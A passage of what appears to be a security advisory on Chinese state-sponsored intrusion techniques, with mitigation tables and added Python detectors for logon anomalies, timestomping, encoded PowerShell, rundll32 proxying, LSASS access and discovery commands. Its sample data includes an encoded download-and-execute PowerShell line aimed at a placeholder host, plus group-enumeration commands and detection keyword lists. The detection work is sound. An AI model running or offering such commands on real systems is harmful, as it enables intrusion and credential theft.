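    """(process, image) -> reasons, for every load that tripped a check."""
    flagged = {}
    for e in events:
        reasons = analyze_image_load(e)
        if reasons:
            flagged[(e["process"], e["image"])] = reasons
    return flagged
```

The second record is the textbook case: the application's own directory is searched before the system directory, so a file named version.dll placed beside app.exe wins. The "Enable safe DLL search mode" bullet refers to the SafeDllSearchMode value under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager, which moves the current directory later in the search order but does not change the application-directory-first rule that this record exploits, so monitoring remains necessary.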

Modify Authentication Process [T1556]

Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.

Note: this technique also applies to Defense Evasion [TA0005] and Credential Access [TA0006].

  • Monitor for policy changes to authentication mechanisms used by the domain controller. 
  • Monitor for modifications to functions exported from authentication DLLs (such as cryptdll.dll and samsrv.dll).
  • Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. 
  • Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). 
  • Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
  • Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.

Detect: 

  • Process Analysis [D3-PA]
  • User Behavior Analysis
    • Authentication Event Thresholding [D3-ANET]
    • User Geolocation Logon Pattern Analysis [D3-UGLPA]  
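The account-behavior bullets above (one account on multiple systems at once, logons at odd hours, a session with no matching badge-in or VPN record) as an added Python example over constructed session, badge and VPN records. It is not the advisory's code; the max_hosts threshold and business hours are assumptions. The same logic serves the Authentication Event Thresholding entry in the Valid Accounts [T1078] row.

```python
from datetime import datetime, time

BUSINESS_HOURS = (time(7, 0), time(19, 0))   # assumption: local office hours


def _dt(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed logon sessions (4624/4634 pairs as a SIEM would join them).
# Monday 2021-07-12: jsmith is on WS-101 and, inside that session, on three
# more hosts at once. Sunday 2021-07-11 02:30: mlee logs on interactively.
SESSIONS = [
    {"user": "jsmith", "host": "WS-101", "start": _dt("2021-07-12T08:55:00"),
     "end": _dt("2021-07-12T17:30:00"), "interactive": True},
    {"user": "jsmith", "host": "WS-102", "start": _dt("2021-07-12T09:10:00"),
     "end": _dt("2021-07-12T09:40:00"), "interactive": True},
    {"user": "jsmith", "host": "FS-01", "start": _dt("2021-07-12T09:15:00"),
     "end": _dt("2021-07-12T09:20:00"), "interactive": False},
    {"user": "jsmith", "host": "DC-01", "start": _dt("2021-07-12T09:16:00"),
     "end": _dt("2021-07-12T09:18:00"), "interactive": False},
    {"user": "mlee", "host": "WS-110", "start": _dt("2021-07-11T02:30:00"),
     "end": _dt("2021-07-11T03:10:00"), "interactive": True},
]
# Constructed physical-access and VPN records for the same days.
BADGE_INS = {("jsmith", "2021-07-12")}
VPN_SESSIONS = []   # entries would look like {"user", "start", "end"}


def max_concurrent_hosts(sessions, user: str) -> int:
    """Peak number of distinct hosts on which `user` had overlapping sessions."""
    events = []
    for s in sessions:
        if s["user"] == user:
            events.append((s["start"], 1, s["host"]))
            events.append((s["end"], -1, s["host"]))
    events.sort()          # at equal timestamps, -1 sorts before +1: end first
    active, peak = set(), 0
    for _, delta, host in events:
        if delta == 1:
            active.add(host)
        else:
            active.discard(host)
        peak = max(peak, len(active))
    return peak


def outside_business_hours(when: datetime) -> bool:
    start, end = BUSINESS_HOURS
    return when.weekday() >= 5 or not (start <= when.time() <= end)


def presence_conflict(session, badge_ins, vpn_sessions) -> bool:
    """Interactive logon with no badge-in that day and no VPN session covering
    its start time: the advisory's 'logged in but not in the building' case."""
    if not session["interactive"]:
        return False
    day = session["start"].date().isoformat()
    if (session["user"], day) in badge_ins:
        return False
    return not any(v["user"] == session["user"] and v["start"] <= session["start"] <= v["end"]
                   for v in vpn_sessions)


def triage(sessions, badge_ins, vpn_sessions, max_hosts: int = 3) -> dict:
    """user -> list of findings. max_hosts is an assumed threshold; service
    accounts and help-desk staff will need their own."""
    findings = {}
    for user in sorted({s["user"] for s in sessions}):
        n = max_concurrent_hosts(sessions, user)
        if n > max_hosts:
            findings.setdefault(user, []).append(f"active on {n} hosts at once")
    for s in sessions:
        if outside_business_hours(s["start"]):
            findings.setdefault(s["user"], []).append(
                f"logon to {s['host']} outside business hours")
        if presence_conflict(s, badge_ins, vpn_sessions):
            findings.setdefault(s["user"], []).append(
                f"interactive logon to {s['host']} without badge-in or VPN")
    return findings
```

The concurrency sweep treats a session's end as happening before a new start at the same instant, so back-to-back sessions on two hosts do not count as overlap; only genuinely simultaneous sessions raise the peak.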

Server Software Component [T1505]

Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. 

  • Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
  • Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
  • Perform integrity checks on critical servers to identify and investigate unexpected changes.
  • Have application developers sign their code using digital signatures to verify their identity.
  • Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.
  • Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.
  • If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.
  • Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
  • Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
  • Establish, and back up offline, a “known good” version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
  • Employ user input validation to restrict exploitation of vulnerabilities.
  • Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
  • Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.

Detect: 

  • Network Traffic Analysis
    • Client-server Payload Profiling [D3-CSPP]
    • Per Host Download-Upload Ratio Analysis [D3-PHDURA]
  • Process Analysis 
    • Process Spawn Analysis
      • Process Lineage Analysis [D3-PLA]

Isolate:

  • Network Isolation
    • Inbound Traffic Filtering [D3-ITF]

Create or Modify System Process [T1543]

Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.

Note: this technique also applies to Privilege Escalation [TA0004].

  • Only allow authorized administrators to make service changes and modify service configurations. 
  • Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.
  • Monitor WMI and PowerShell for service modifications.

Detect:

  • Process Analysis 
    • Process Spawn Analysis [D3-PSA]

Tactics: Privilege Escalation [TA0004]

Table VI: Chinese state-sponsored cyber actors’ Privilege Escalation TTPs with detection and mitigation recommendations

Threat Actor Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Domain Policy Modification [T1484]

Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.

Note: this technique also applies to Defense Evasion [TA0005].

  • Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.
  • Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.
  • Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.

Detect:

  • Network Traffic Analysis
    • Administrative Network Activity Analysis [D3-ANAA]
  • Platform Monitoring
    • Operating System Monitoring

Process Injection [T1055]

Chinese state-sponsored cyber actors have been observed:

  • Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement.
  • Using shellcode that injects implants into newly created instances of the Service Host process (svchost).

Note: this technique also applies to Defense Evasion [TA0005].
 

  • Use endpoint protection software to block process injection based on behavior of the injection process.
  • Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
  • Monitor for suspicious sequences of Windows API calls such as CreateRemoteThread, VirtualAllocEx, or WriteProcessMemory and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.
  • To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.

Isolate:

  • Execution Isolation
    • Hardware-based Process Isolation [D3-HBPI]
    • Mandatory Access Control [D3-MAC]

Tactics: Defense Evasion [TA0005]

Table VII: Chinese state-sponsored cyber actors’ Defense Evasion TTPs with detection and mitigation recommendations

Threat Actor Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Deobfuscate/Decode Files or Information [T1140]

Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.

  • Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
  • Consider blocking, disabling, or monitoring use of 7-Zip.

Detect: 

  • Process Analysis 
    • Process Spawn Analysis [D3-PSA]

Isolate: 

  • Execution Isolation
    • Executable Denylisting [D3-EDL]

Hide Artifacts [T1564]

Chinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.

  • Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.
  • Monitor event and authentication logs for records of hidden artifacts being used.
  • Monitor the file system and shell commands for hidden attribute usage.

Detect: 

  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA]

Isolate:

  • Execution Isolation
    • Executable Allowlisting [D3-EAL]

Indicator Removal from Host [T1070]

Chinese state-sponsored cyber actors have been observed deleting files using rm or del commands.
Several of the files the cyber actors targeted were timestomped so that their timestamps differ from when the files were actually created or used.

  • Make the environment variables associated with command history read only to ensure that the history is preserved.
  • Recognize timestomping by monitoring the contents of important directories and the attributes of the files. 
  • Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their ~/.bash_history or ConsoleHost_history.txt files.
  • Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.
  • Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.

Detect: 

  • Platform Monitoring
    • Operating System Monitoring
  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA]

Isolate:

  • Execution Isolation
    • Executable Allowlisting [D3-EAL]
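An added example, not from the advisory, for the timestomping and directory-monitoring bullets above: snapshot() records the modification time, size and hash of every file under a directory, and compare() diffs two snapshots to surface the inconsistencies the advisory describes (content changed with the modification time untouched, a modification time that moved backwards, files removed or added). The two snapshots below are constructed, with illustrative hash strings rather than real digests.

```python
import hashlib
import os


def snapshot(root: str) -> dict:
    """Record modification time, size and SHA-256 of every file under `root`.
    Run it from a known-good state and keep the result off the host, so an
    intruder who edits the files cannot also edit the baseline."""
    result = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            result[path] = {"mtime": st.st_mtime, "size": st.st_size, "sha256": digest}
    return result


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots; returns path -> reasons for every inconsistency."""
    findings = {}
    for path, old in baseline.items():
        new = current.get(path)
        if new is None:
            findings[path] = ["file deleted since baseline"]
            continue
        reasons = []
        changed = new["sha256"] != old["sha256"]
        if changed and new["mtime"] == old["mtime"]:
            # Content replaced but mtime put back: the classic timestomp.
            reasons.append("content changed but modification time unchanged")
        if new["mtime"] < old["mtime"]:
            reasons.append("modification time moved backwards")
        if changed and new["mtime"] > old["mtime"]:
            reasons.append("content changed (verify against change records)")
        if reasons:
            findings[path] = reasons
    for path in sorted(current.keys() - baseline.keys()):
        findings[path] = ["new file not in baseline"]
    return findings


# Constructed snapshots of a web root and a shell history: "yesterday" vs
# "now". The sha256 values are illustrative strings, not digests of real files.
BASELINE = {
    "/var/www/html/index.php": {"mtime": 1620000000.0, "size": 4120, "sha256": "aa11"},
    "/var/www/html/login.php": {"mtime": 1620000000.0, "size": 2210, "sha256": "bb22"},
    "/var/www/html/images/logo.png": {"mtime": 1610000000.0, "size": 9000, "sha256": "cc33"},
    "/root/.bash_history": {"mtime": 1625600000.0, "size": 800, "sha256": "dd44"},
}
CURRENT = {
    "/var/www/html/index.php": {"mtime": 1620000000.0, "size": 4120, "sha256": "aa11"},
    # login.php rewritten, yet its mtime is identical to the baseline
    "/var/www/html/login.php": {"mtime": 1620000000.0, "size": 2810, "sha256": "ee55"},
    "/var/www/html/images/logo.png": {"mtime": 1610000000.0, "size": 9000, "sha256": "cc33"},
    # shell history truncated and its mtime set into the past
    "/root/.bash_history": {"mtime": 1600000000.0, "size": 120, "sha256": "ff66"},
    # a new script appeared in a directory that should only hold images
    "/var/www/html/images/cache.php": {"mtime": 1625700000.0, "size": 512, "sha256": "0077"},
}
```

A hash-plus-mtime baseline is what makes timestomping visible: an attacker can set any timestamp they like, but cannot make the new content hash to the old value, so the "changed but mtime unchanged" combination has no benign explanation.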

Obfuscated Files or Information [T1027]

Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.

Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after they have been processed/interpreted.

Detect:

  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA]

Signed Binary Proxy Execution [T1218]

Chinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as Rundll32, as a proxy to execute malicious payloads.

Monitor processes for the execution of known proxy binaries (e.g., rundll32.exe) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.

Detect:

  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA]
    • Process Spawn Analysis [D3-PSA]
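An added example serving both the Obfuscated Files or Information [T1027] row (Base64-encoded command strings) and the Signed Binary Proxy Execution [T1218] row above; it is not code from the advisory. It decodes PowerShell -EncodedCommand arguments (UTF-16LE text under Base64) so the script can be inspected, and checks rundll32 invocations against a baseline of DLL/export pairs. The command lines, the baseline and the token list are constructed; example.invalid is a reserved name that never resolves.

```python
import base64
import ntpath
import re
import shlex

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec.
_ENC_SWITCHES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"},
                       key=len, reverse=True)
ENC_FLAG = re.compile(r"(?:^|\s)-(?:" + "|".join(_ENC_SWITCHES) + r")\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)

# Tokens whose presence in a *decoded* script is worth an analyst's time.
SUSPICIOUS_TOKENS = ("invoke-expression", "downloadstring", "downloadfile",
                     "frombase64string")

# Assumed baseline of (dll basename, export) pairs that rundll32 legitimately
# runs on this estate. Build yours from observed data.
RUNDLL32_BASELINE = {("shell32.dll", "control_rundll"), ("user32.dll", "lockworkstation")}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Constructed sample: a script encoded the way PowerShell expects (UTF-16LE,
# then Base64). example.invalid is a reserved, never-resolving name.
SAMPLE_SCRIPT = "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://example.invalid/s')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -W Hidden -Enc {SAMPLE_B64}",
    r"rundll32.exe C:\Users\jsmith\AppData\Local\Temp\upd.dll,Start",
    r"rundll32.exe shell32.dll,Control_RunDLL hotplug.dll",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_rundll32(cmdline: str) -> list:
    """Compare a rundll32 invocation with the baseline of DLL/export pairs."""
    args = shlex.split(cmdline, posix=False)
    if len(args) < 2:
        return ["rundll32 without a DLL argument"]
    target = args[1].strip('"')
    if "," in target:
        dll, _, export = target.rpartition(",")
    else:
        dll, export = target, ""
    dll_l = dll.lower()
    name = ntpath.basename(dll_l)
    reasons = []
    if not name.endswith(".dll"):
        reasons.append("rundll32 target is not a .dll file")
    if any(p in dll_l for p in USER_WRITABLE):
        reasons.append("DLL in user-writable path")
    if (name, export.lower()) not in RUNDLL32_BASELINE:
        reasons.append("DLL/export pair not in baseline")
    return reasons


def triage_process(cmdline: str) -> list:
    """Findings for one process-creation command line; [] when nothing tripped."""
    parts = shlex.split(cmdline, posix=False)
    if not parts:
        return []
    exe = ntpath.basename(parts[0].strip('"')).lower()
    reasons = []
    if exe in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            reasons.append("encoded PowerShell command")
            low = decoded.lower()
            reasons += [f"decoded script contains {t}" for t in SUSPICIOUS_TOKENS if t in low]
    elif exe == "rundll32.exe":
        reasons += analyze_rundll32(cmdline)
    return reasons
```

Decoding at ingest time is the cheap complement to the AMSI recommendation in the T1027 row: AMSI sees the script as the engine runs it on the endpoint, while this decoding lets the SIEM search encoded command lines that were logged before AMSI was in place or on hosts where it is not.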

Tactics: Credential Access [TA0006]

Table VIII: Chinese state-sponsored cyber actors’ Credential Access TTPs with detection and mitigation recommendations

Threat Actor Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Exploitation for Credential Access [T1212]

Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.

  • Update and patch software regularly.

  • Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.

Harden: 

  • Platform Hardening

  • Credential Hardening

OS Credential Dumping [T1003]
  • LSASS Memory [T1003.001]
  • NTDS [T1003.003]

Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active Directory (NTDS.DIT) for credential dumping.

  • Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.DIT.

  • Ensure that local administrator accounts have complex, unique passwords across all systems on the network.

  • Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.

  • Consider disabling or restricting NTLM. 

  • Consider disabling WDigest authentication. 

  • Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).

  • Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. It is not enabled by default and has hardware and firmware requirements. 

  • Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.

Harden:

Detect: 

  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA]
    • System Call Analysis [D3-SCA]

Isolate: 

  • Execution Isolation
    • Hardware-based Process Isolation [D3-HBPI]
    • Mandatory Access Control [D3-MAC]
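The System Call Analysis entry for this row, as an added example that is not the advisory's: it triages constructed Sysmon Event ID 10 (ProcessAccess) records against lsass.exe by source image and by the Win32 access mask the source requested. The trusted-reader allowlist is an assumption to be replaced by a measured baseline.

```python
import ntpath

# Win32 process access rights (from the Windows SDK) that matter for reading
# credential material out of another process.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
PROCESS_ALL_ACCESS = 0x1FFFFF
MEMORY_ACCESS = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE

# Assumed allowlist of images that legitimately open lsass.exe with memory
# access on this estate (OS components and the AV engine). Measure yours during
# a baseline period; do not copy this list.
TRUSTED_LSASS_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon Event ID 10 (ProcessAccess) records.
SAMPLE_ACCESS_EVENTS = [
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Users\jsmith\AppData\Local\Temp\svc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"SourceImage": r"C:\Users\jsmith\AppData\Local\Temp\svc.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
]


def triage_lsass_access(event: dict) -> str:
    """'ignore' (target is not lsass, or the source is a trusted reader),
    'low' (untrusted process opened lsass without memory rights) or 'high'
    (untrusted process asked for memory read/write or duplicate-handle rights)."""
    if ntpath.basename(event["TargetImage"]).lower() != "lsass.exe":
        return "ignore"
    if event["SourceImage"].lower() in TRUSTED_LSASS_READERS:
        return "ignore"
    granted = int(event["GrantedAccess"], 16)
    if granted & MEMORY_ACCESS or granted == PROCESS_ALL_ACCESS:
        return "high"
    return "low"


def high_severity_sources(events) -> list:
    """Distinct untrusted source images that requested memory access to lsass."""
    return sorted({e["SourceImage"] for e in events
                   if triage_lsass_access(e) == "high"})
```

The Protected Process Light bullet above is the preventive counterpart: with RunAsPPL set to 1 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, an unprotected process's request for these rights is refused by the kernel, and the ProcessAccess event then records the denial rather than a successful read.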

Tactics: Discovery [TA0007]

Table IX: Chinese state-sponsored cyber actors’ Discovery TTPs with detection and mitigation recommendations

Threat Actor Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

File and Directory Discovery [T1083]

Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.

Detect: 

  • User Behavior Analysis

  • Process Analysis 

    • Database Query String Analysis [D3-DQSA]

    • File Access Pattern Analysis [D3-FAPA]

    • Process Spawn Analysis [D3-PSA]

Permission Group Discovery [T1069]

Chinese state-sponsored cyber actors have been observed using commands, including net group and net localgroup, to enumerate the different user groups on the target network. 

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Detect: 

  • Process Analysis 

  • Process Spawn Analysis [D3-PSA]

  • User Behavior Analysis [D3-UBA]  

Process Discovery [T1057]

Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices.

Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. 

Detect: 

Network Service Scanning [T1046]

Chinese state-sponsored cyber actors have been observed using Nbtscan and nmap to scan and enumerate target network information.

  • Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation.

  • Use network intrusion detection and prevention systems to detect and prevent remote service scans such as Nbtscan or nmap.

  • Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.

Detect: 

Isolate:

Remote System Discovery [T1018]

Chinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including ping, net group, and net user to enumerate target network information.

Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.

Detect: 

  • Process Analysis 

  • User Behavior Analysis
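The process and command-line monitoring that the Discovery rows above recommend, as an added example (not code from the advisory or from CISA). It classifies constructed process events against the commands named in the table (net group / net localgroup, tasklist, Nbtscan and nmap, ping and net user), decodes a PowerShell -EncodedCommand payload before matching so that Base64 encoding does not hide the command, and flags a host that runs ping.exe in quick succession. The event fields, the burst threshold and all sample events are assumptions.

```python
"""Surface Discovery-phase command activity (TA0007) from process events.

Added example. The event fields (host, ts, image, cmdline), the sample
events and the burst threshold are assumptions; the rules follow the
advisory's detection guidance for this tactic.
"""
import base64
import ntpath
import re
from collections import defaultdict

# (rule name, ATT&CK id, regex over the lower-cased command line plus any
# decoded -EncodedCommand payload)
DISCOVERY_RULES = [
    ("permission_group_discovery", "T1069",
     re.compile(r"\bnet1?(\.exe)?\s+(group|localgroup)\b")),
    ("process_discovery", "T1057",
     re.compile(r"\b(tasklist|taskmgr)(\.exe)?\b|(^|[\s;|&])ps(\s|$)")),
    ("network_service_scanning", "T1046",
     re.compile(r"\b(nbtscan|nmap)(\.exe)?\b")),
    ("remote_system_discovery", "T1018",
     re.compile(r"\b(ping|tracert)(\.exe)?\s|\bnet1?(\.exe)?\s+(user|view)\b")),
]

# PowerShell accepts -e, -ec, -enc and -EncodedCommand for Base64 UTF-16LE input.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([a-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "ignore")
    except ValueError:
        return None


def classify(event):
    """Sorted rule names an event triggers; the decoded payload is matched too."""
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded
    text = text.lower()
    return sorted(name for name, _, rx in DISCOVERY_RULES if rx.search(text))


def summarize(events):
    """host -> sorted list of distinct discovery rules seen on that host."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]].update(classify(ev))
    return {host: sorted(rules) for host, rules in seen.items() if rules}


def find_ping_bursts(events, threshold=5, window_s=10):
    """Hosts running ping.exe at least `threshold` times within `window_s`
    seconds (the 'quick succession' the advisory calls out)."""
    times = defaultdict(list)
    for ev in events:
        if ntpath.basename(ev["image"]).lower() == "ping.exe":
            times[ev["host"]].append(ev["ts"])
    bursts = []
    for host, ts in times.items():
        ts.sort()
        best, start = 0, 0
        for end in range(len(ts)):          # sliding window over sorted times
            while ts[end] - ts[start] > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts.append((host, best))
    return bursts


# Constructed sample events (epoch seconds; not real telemetry).
_ENCODED = base64.b64encode("ping 10.0.0.5; net user /domain".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c net group "Domain Admins" /domain'},
    {"host": "WS01", "ts": 101, "image": r"C:\Windows\System32\tasklist.exe",
     "cmdline": "tasklist.exe /v"},
    {"host": "WS01", "ts": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    *[{"host": "WS02", "ts": 200 + i, "image": r"C:\Windows\System32\PING.EXE",
       "cmdline": f"ping.exe -n 1 10.0.0.{i + 1}"} for i in range(5)],
    {"host": "WS03", "ts": 300, "image": r"C:\Tools\nbtscan.exe",
     "cmdline": "nbtscan.exe 10.0.0.0/24"},
    {"host": "WS03", "ts": 301, "image": r"C:\Program Files\Browser\browser.exe",
     "cmdline": "browser.exe --type=renderer"},
]

if __name__ == "__main__":
    print(summarize(SAMPLE_EVENTS))
    print("ping bursts:", find_ping_bursts(SAMPLE_EVENTS))
```

Individual discovery commands are common administrative activity; the per-host summary exists so an analyst can prioritise hosts that show several discovery techniques in a short span rather than alert on every `tasklist`.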

Tactics: Lateral Movement [TA0008]

Table X: Chinese state-sponsored cyber actors’ Lateral Movement TTPs with detection and mitigation recommendations

Columns: Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques

Exploitation of Remote Services [T1210]

Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.

Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.

  • Disable or remove unnecessary services.

  • Minimize permissions and access for service accounts.

  • Perform vulnerability scanning and update software regularly.

  • Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.

Detect: 

Isolate:

Tactics: Collection [TA0009]

Table XI: Chinese state-sponsored cyber actors’ Collection TTPs with detection and mitigation recommendations

Columns: Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques

Archive Collected Data [T1560]

Chinese state-sponsored cyber actors compressed and encrypted files intended for exfiltration into RAR archives, and subsequently used cloud storage services to store them.

  • Scan systems to identify unauthorized archival utilities or methods unusual for the environment.

  • Monitor command-line arguments for known archival utilities that are not common in the organization’s environment.

Detect: 

  • Process Analysis 

    • File Access Pattern Analysis [D3-FAPA]

    • Process Spawn Analysis [D3-PSA]

Isolate:

Clipboard Data [T1115]

Chinese state-sponsored cyber actors used RDP and executed rdpclip.exe to exfiltrate information from the clipboard.

  • Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of pbcopy/pbpaste (Linux) or clip.exe (Windows) run by general users through command line).

  • If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor’s ability to exfiltrate data.

Detect:

Isolate:

  • Network Isolation

